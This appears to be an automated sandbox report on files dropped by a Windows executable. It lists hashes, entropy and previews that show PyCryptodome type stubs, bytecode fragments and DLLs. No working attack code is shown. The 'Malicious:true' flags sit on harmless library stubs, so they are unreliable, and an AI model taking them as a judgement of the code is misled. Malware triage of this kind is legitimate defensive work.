                                                                                                                                            Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: ...........def new(rsa_key: RsaKey, mgfunc: Optional[MaskFunction]=None, saltLen: Optional[int]=None, randfunc: Optional[RndFunction]=None) -> PSS_SigScheme: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):467
                                                                                                                                            Entropy (8bit):4.916093935652459
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .........def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):747
                                                                                                                                            Entropy (8bit):4.991320777959256
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional..from typing_extensions import Protocol..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class XOF(Protocol):.. def read(self, len: int) -> bytes: .......def import_public_key(encoded: bytes) -> EccKey: .....def import_private_key(encoded: bytes) -> EccKey: .......class EdDSASigScheme(object):.... def __init__(self, key: EccKey, context: bytes) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_or_hash: Union[bytes, Hash, XOF]) -> bytes: ..... def verify(self, msg_or_hash: Union[bytes, Hash, XOF], signature: bytes) -> None: .......def new(key: EccKey, mode: str, context: Optional[bytes]=None) -> EdDSASigScheme: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):581
                                                                                                                                            Entropy (8bit):5.067047688730709
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .......def _EMSA_PKCS1_V1_5_ENCODE(msg_hash: Hash, emLen: int, with_hash_parameters: Optional[bool]=True) -> bytes: .......def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1071
                                                                                                                                            Entropy (8bit):5.102431129383602
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .........MGF1 : MaskFunction..def _EMSA_PSS_ENCODE(mhash: Hash, emBits: int, randFunc: RndFunction, mgf:MaskFunction, sLen: int) -> str: .....def _EMSA_PSS_VERIFY(mhash: Hash, em: str, emBits: int, mgf: MaskFunction, sLen: int) -> None: .....def new(rsa_key: RsaKey, *
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):295
                                                                                                                                            Entropy (8bit):4.705947008789207
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):243
                                                                                                                                            Entropy (8bit):4.823438083026704
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):166
                                                                                                                                            Entropy (8bit):4.7074966574817525
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1173
                                                                                                                                            Entropy (8bit):4.98010062497697
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.Z.g.d...Z.d.S.).a[...Miscellaneous modules..Contains useful modules that don't belong into any of the.other Crypto.* subpackages...======================== =============================================.Module Description.======================== =============================================.`Crypto.Util.number` Number-theoretic functions (primality testing, etc.).`Crypto.Util.Counter` Fast counter functions for CTR cipher modes..`Crypto.Util.RFC1751` Converts between 128-bit keys and human-readable. strings of words..`Crypto.Util.asn1` Minimal support for ASN.1 DER encoding.`Crypto.Util.Padding` Set of functions for adding and removing padding..======================== =============================================..:undocumented: _galois, _number_new, cpuid, py3compat, _raw_api.)...RFC1751..number..strxor..asn1..Counter..PaddingN)...__doc__..__all__..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):948
                                                                                                                                            Entropy (8bit):4.772633084811178
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................6.....d.d.l.m.Z.....e.d.d...............Z.d...Z.d...Z.d.S.)......)...load_pycryptodome_raw_libz.Crypto.Util._cpuid_cz.. int have_aes_ni(void);. int have_clmul(void);. c.....................4.....t...............................................S...N)..._raw_cpuid_lib..have_aes_ni........mC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\Util\_cpu_features.pyr....r....)...s...........%..%..'..'..'r....c.....................4.....t...............................................S.r....).r......have_clmulr....r....r....r....r....-...s...........$..$..&..&..&r....N)...Crypto.Util._raw_apir....r....r....r....r....r....r......<module>r........s].........>..;..:..:..:..:..:....+..*.+A...,/....0....0......(....(....(....'....'....'....'....'r....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):4.354688723015057
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:def have_aes_ni() -> int: .....def have_clmul() -> int: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10240
                                                                                                                                            Entropy (8bit):4.730605326965181
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
                                                                                                                                            MD5:4D9C33AE53B38A9494B6FBFA3491149E
                                                                                                                                            SHA1:1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
                                                                                                                                            SHA-256:0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
                                                                                                                                            SHA-512:BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1316
                                                                                                                                            Entropy (8bit):5.20264084712239
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:D1Vjobn4Y5J/H0r2HBZ8SlwC8El3OyrPE2W2OHhavkQGovvvE:DHoLrEYZkCreyTE2W/HhOkpovvvE
                                                                                                                                            MD5:ABD9E1FDC477BAEB99043048F0EC851C
                                                                                                                                            SHA1:A8469F15D63DAD61BBAF07E4D04A59D82FF32F5E
                                                                                                                                            SHA-256:37DCD3994BB6B31E615094EFD05BCD35968BD2520F0423CCB09DD9EE06E7E331
                                                                                                                                            SHA-512:D98C26F44229460F144ECE1A3A6A000EE3AA659413BAC75774C8EBB30E28565974A310AD5B5D6F931D2AADF8C05DA917ABEA7A4A20DC2C0E50C5F49456C6280E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d.l.Z.d...Z.d.S.)......Nc.....................d.....|.d...........d.k.....r.t...........d.................t...........|.d.d...........................|.g.z...}.t...........j...............................t...........j...............................t.......................................\...}.}.t...........j...............................|.d...............}.t...........j.........j.........|.g.|...R...S.).a....Return the complete file name for the module.. dir_comps : list of string. The list of directory names in the PyCryptodome package.. The first element must be "Crypto"... filename : string. The filename (inclusing extension) in the target directory.. r......Cryptoz)Only available for modules under 'Crypto'.....Nz...)...ValueError..list..os..path..split..abspath..__file__..join)...dir_comps..filename..util_lib.._..root_libs.... .lC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-pa
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):103
                                                                                                                                            Entropy (8bit):4.5743153977203175
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBAWxXfcAiTMXtKIOcSkWtWemUL/:1REYB9xXkVM96nRWe1/
                                                                                                                                            MD5:FFE308959102B5607429CEF941E9560E
                                                                                                                                            SHA1:3DA8DA002FEBDA41FE88459082E6CD8E57B9A5B3
                                                                                                                                            SHA-256:2F8B0576992C17D8191119B78CF52F73540F11F2502360F71266F5FF848FB5B5
                                                                                                                                            SHA-512:35EE20412D0AC941F7368DAB82E4A4996DF4058981BA6C07B24E99D533C2BE38E65B8911A7E99EE03A370DF63B557DD3F77839CA10BE939C98BE3E14BB650C65
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import List......def pycryptodome_filename(dir_comps: List[str], filename: str) -> str: ...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14318
                                                                                                                                            Entropy (8bit):5.246376378295745
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:3ZiNdoN17fItDTvw/vlEVW5B6UVMmUtmKlTRxKmf9rZTSLI1wEOuPxeDl62i5lPU:JKdoN1zsTvedBB6UGmUvzxHTSowEXxro
                                                                                                                                            MD5:825DE521ED777BFAAE164D806E3D336E
                                                                                                                                            SHA1:ABD957E993F9861A1D184FB64C45BD337EF61203
                                                                                                                                            SHA-256:E11D4A79ADEEA5BCB49E5E36791D48BDA3A934781AA9BA3C3FFA3F27183C52B3
                                                                                                                                            SHA-512:9CC8216770E884DCD38FB9CAE7F83E74329A4302127CA513E15A58AFA48B93EB4AA14264642F78A942C6E145E32E0B37C2EAC76D4682212FD51175D53B0D70C6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e}*........................*.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.........d...........d.k.....r=d.d.l.Z.g.Z...e.j.......................D.]&\...Z.Z.Z.e.e.j.........k.....r.e.......................e..................'n.d.d.l.m.Z...e.j.........Z.e.e.f.Z...G.d...d.e...............Z...d.e.j.........v.r.e.j.........j.........d.k.....r...e.d.................e.j.........d.k.....r.e.j.........d.k.....r...e.d.................d.d.l.m.Z.....e...............Z.e.j ........Z!e.."....................e..#....................d.............................Z$e..#....................d...............j%........j&........Z'd...Z(d...Z)e)Z*e)Z+e)Z,d...Z-d/d...Z.d...Z/d...Z0d...Z1..G.d...d.e...............Z2d...Z3d.Z4n.#.e.$.r...d.d.l5Z5d.d.l5m6Z6m7Z7m8Z8m)Z)m*Z*m-Z-m.Z.m,Z,m+Z+..d.d.l9m:Z:..d.d.l5m;Z'..d.Z!g.Z<d...Z,d ..Z(d!..Z/d"..Z0e5j=........Z>d.Z?e5j@........jA........ZBe5j@........jC........ZDe5jE........ZF..e5jG........e>..............ZH..G.d#..d$e5jI......................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):933
                                                                                                                                            Entropy (8bit):4.777842095513583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RExEeWw8O8GLziQDqwhBhhB+OTlAavvsZPWJuL:8EeTLPqkVv+PiE
                                                                                                                                            MD5:577B9FD6612492C13AAD9D5FDC396C43
                                                                                                                                            SHA1:2840A5AE5DA3ADA506BC9E64F4FB1324C021FCA7
                                                                                                                                            SHA-256:83C6B0310C82B4193830D59B3DABE23544ACF53FF2B53E0F918F2E8DB01F7485
                                                                                                                                            SHA-512:67E8794F498344EBEE1F95351169355EA139AE6937E867B7716E7A06ECEB3AE30F430630370BE7B06F325434041D9581DFA3831FFBF5F67FF7F88AE24C2935F0
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Optional, Union....def load_lib(name: str, cdecl: str) -> Any : .....def c_ulong(x: int ) -> Any : .....def c_ulonglong(x: int ) -> Any : .....def c_size_t(x: int) -> Any : .....def create_string_buffer(init_or_size: Union[bytes,int], size: Optional[int]) -> Any : .....def get_c_string(c_string: Any) -> bytes : .....def get_raw_buffer(buf: Any) -> bytes : .....def c_uint8_ptr(data: Union[bytes, memoryview, bytearray]) -> Any : .......class VoidPointer(object):.. def get(self) -> Any : ..... def address_of(self) -> Any : .......class SmartPointer(object):.. def __init__(self, raw_pointer: Any, destructor: Any) -> None : ..... def get(self) -> Any : ..... def release(self) -> Any : .......backend : str..null_pointer : Any..ffi: Any....def load_pycryptodome_raw_lib(name: str, cdecl: str) -> Any : .....def is_buffer(x: Any) -> bool : .....def is_writeable_buffer(x: Any) -> bool : .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10240
                                                                                                                                            Entropy (8bit):4.685843290341897
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
                                                                                                                                            MD5:8F4313755F65509357E281744941BD36
                                                                                                                                            SHA1:2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
                                                                                                                                            SHA-256:70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
                                                                                                                                            SHA-512:FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3885
                                                                                                                                            Entropy (8bit):4.815634844501543
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Acab6f+hGLbu31eXTTVkwB60oofRTOB+Jk2:AcjuJYTTVkS6IF6+m2
                                                                                                                                            MD5:1EFE3020CA61E0B1DA7B8680D73F84DA
                                                                                                                                            SHA1:D996C31812286881EB3D6E3FA28715095EC5587F
                                                                                                                                            SHA-256:4DB889724654605FF759C5B7D754174D13F71B3B621792E48AD0F9BE0CFCCC57
                                                                                                                                            SHA-512:12D48E230826E09437536FB35642F434E71D5C219A6B61FAF064B785CD09E131F7595AC7DBE1A359C81B23DC24B3436F6AFDF9CE7EBD6961EBEDAF23F5F81F28
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: bool=...) -> DerObject: .......class DerInte
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67200
                                                                                                                                            Entropy (8bit):5.287221389845664
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:R9jNqUkXZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHX7:RutpyUy0lsEgZOtg78sI6VTLQ5DRvvze
                                                                                                                                            MD5:ECA9E39BA42E91E16483AA4FA413371B
                                                                                                                                            SHA1:90742AF469908E7B83DD57E79C7CF0943D8A126E
                                                                                                                                            SHA-256:49EA4EF4705CCCA19A512A294D6F49B4B669BB88BFCF7400BA5A25ECD3B1E11C
                                                                                                                                            SHA-512:D934181197581A903E74F57E517E8719FFE2FA398CE81E22EDFDF01294C8F9E10FEC2427FBE52C1703C999A30558D29DE2B5F96A211A507DE45FB14FA4E327C7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eh~..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.........d.d.............d.k.....r.e.j.........Z.n.d...Z.e.j.........d.d.............d.k.....r.d...Z.n.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.l.Z.d.d...Z.d...Z.d.d.l.Z.d.d...Z.d...Z.d.Z.d.S.)......N)...Random)...iter_rangec..........................|.d.k.....r.t...........................|.d.k.....s.|.d.k.....r.t...........d.................t...........|.|...............\...}.}.|.d.k.....r.|.d.k.....r.|.d.z...}.|.S.).zDReturn ceil(n/d), that is, the smallest integer r such that r*d >= nr....z.Non positive values.....)...ZeroDivisionError..ValueError..divmod)...n..d..r..qs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\Util\number.py..ceil_divr....%...si...........A.v.v.....!..!..!....A.....1.q.5.5......../../../....!.Q.<.<.D.A.q....Q.....Q.!.V.V....Q........H.....c.....................T.....|.d.k....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):994
                                                                                                                                            Entropy (8bit):4.898132103946567
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
                                                                                                                                            MD5:81227B5A65D7EF13CB0247C9B7225673
                                                                                                                                            SHA1:8954A181B5E8D7B31145E5C139935B9780E4D1EB
                                                                                                                                            SHA-256:6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
                                                                                                                                            SHA-512:12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8014
                                                                                                                                            Entropy (8bit):4.931768215652925
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:EodTTOVYDLOjIWTmpSaRBF7mxzfidDpD6erboFpX8j64rkX202m5PDpAa9DGZ/Ef:EoM+UIW82MvJ0H4rTO5PFJ5G+TyzWWY
                                                                                                                                            MD5:F50A6F0E924A9A3855CF43543ABB8D01
                                                                                                                                            SHA1:29932277B9A4A1E48AE2A83CCE0A72CC4D50560E
                                                                                                                                            SHA-256:0180F289354D7C285F3957AAF7841304C165C4D83ABD6BD68FE03CCF2C49BD5E
                                                                                                                                            SHA-512:D20E77D02D8CD45219374C0A56CDF5753E2CEA312ED9DE1B9294A25103DC5893EAB6E74CD03990464A9FC207A5D9C7CA49A76B434D5939C4762C10854FEE24FE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........ez.........................V.....d.Z.d.d.l.Z.d.d.l.Z.e.j.........d...........d.k.....rJd...Z.d...Z.d...Z.d...Z.d$d...Z.d...Z.d...Z.d...Z.d.d.l.m.Z...e.Z.d.d.l.m.Z...e.Z.d...Z.d...Z.d...Z...e.j.........d.e.f.d.d.i...............Z.e.Z.n>d...Z.d...Z.d...Z.d...Z.d$d...Z.d...Z.d...Z.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.Z.d...Z.d ..Z.d!..Z.d.d"l.m.Z...e.Z.d#..Z.[.[.d.S.)%a....Compatibility code for handling string/bytes changes from Python 2.x to Py3k..In Python 2.x, strings (of type ''str'') contain binary data, including encoded.Unicode text (e.g. UTF-8). The separate type ''unicode'' holds Unicode text..Unicode literals are specified via the u'...' prefix. Indexing or slicing.either type always produces a string of the same type as the original..Data read from a file is always of '''str'' type...In Python 3.x, strings (type ''str'') may only contain Unicode text. The u'...'.prefix and the ''unicode'' type are now redundant. A new type (called.''bytes'') has to be used
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):870
                                                                                                                                            Entropy (8bit):4.791491758318878
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REgT3JtgPnrnIW9h3MnBbRFNU+U4Fu31954iEe1oHhASLjPMQ:pZtgMcUTkDTtoBjLt
                                                                                                                                            MD5:E7EC097AA59EF78A17CCA1860BE69741
                                                                                                                                            SHA1:A25E52635BA19E8324128B8900378458BDAA3AF2
                                                                                                                                            SHA-256:A1913976F178C28B8A7C117093233AAC0D3E772C4876DA9C084382BB95F2AC2D
                                                                                                                                            SHA-512:675F6249EF76BDA58D64ABF2BEB84DA58C04A4054F380BC3C2D63CA0D0CAB3342FB36A43925C6176D494F70AC1AEFD06DDB809F28F4A3412E857ACA1F42E6451
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Any, Optional, IO....Buffer = Union[bytes, bytearray, memoryview]....import sys....def b(s: str) -> bytes: .....def bchr(s: int) -> bytes: .....def bord(s: bytes) -> int: .....def tobytes(s: Union[bytes, str]) -> bytes: .....def tostr(b: bytes) -> str: .....def bytestring(x: Any) -> bool: .......def is_native_int(s: Any) -> bool: .....def is_string(x: Any) -> bool: .....def is_bytes(x: Any) -> bool: .......def BytesIO(b: bytes) -> IO[bytes]: .....def StringIO(s: str) -> IO[str]: .......if sys.version_info[0] == 2:.. from sys import maxint.. iter_range = xrange....else:.. from sys import maxsize as maxint.. iter_range = range....class FileNotFoundError:.. def __init__(self, err: int, msg: str, filename: str) -> None:.. pass....def _copy_bytes(start: Optional[int], end: Optional[int], seq: Buffer) -> bytes: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4841
                                                                                                                                            Entropy (8bit):5.182565008277402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:BUDdkv/39DpsEJwyJfT/bFlvhuz/Z6L0xNWXwy4o:6i5P7ZFhUu0L+wTo
                                                                                                                                            MD5:440359BB55F14231E7ABBBDC13C179AB
                                                                                                                                            SHA1:2280C0E00898C37E10B2FEEB1040B8EC1ED047A9
                                                                                                                                            SHA-256:63060352F7316445AC7C3FBF9E81B2F2E9FEFB853DB33FD9B9E41A0281F7D866
                                                                                                                                            SHA-512:4906E70547A3D449AED5EA7EE5D724B987C043036A9D05D25A38974AC5CB6C1BB3D2F92D8B8AD7F8E3ED51879C2450A0C1CADD34E116AB9CA885D4A24583368B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................T.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z.d.d...Z.d.d...Z.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..create_string_buffer..get_raw_buffer..c_uint8_ptr..is_writeable_bufferz.Crypto.Util._strxoray.... void strxor(const uint8_t *in1,. const uint8_t *in2,. uint8_t *out, size_t len);. void strxor_c(const uint8_t *in,. uint8_t c,. uint8_t *out,. size_t len);. Nc.....................>.....t...........|...............t...........|...............k.....r.t...........d.................|...t...........t...........|.............................}.n_|.}.t...........|...............s.t...........d.................t...........|...............t...........|...............k.....r.t...........d.t...........|.............
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):249
                                                                                                                                            Entropy (8bit):4.800678842548869
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBXyUzrIY3MTDyQdQAY0OXW6ah05gUQdByKj0ah05gv:1REYB3vIY3YyQnrOXAh05VQ6KZh05q
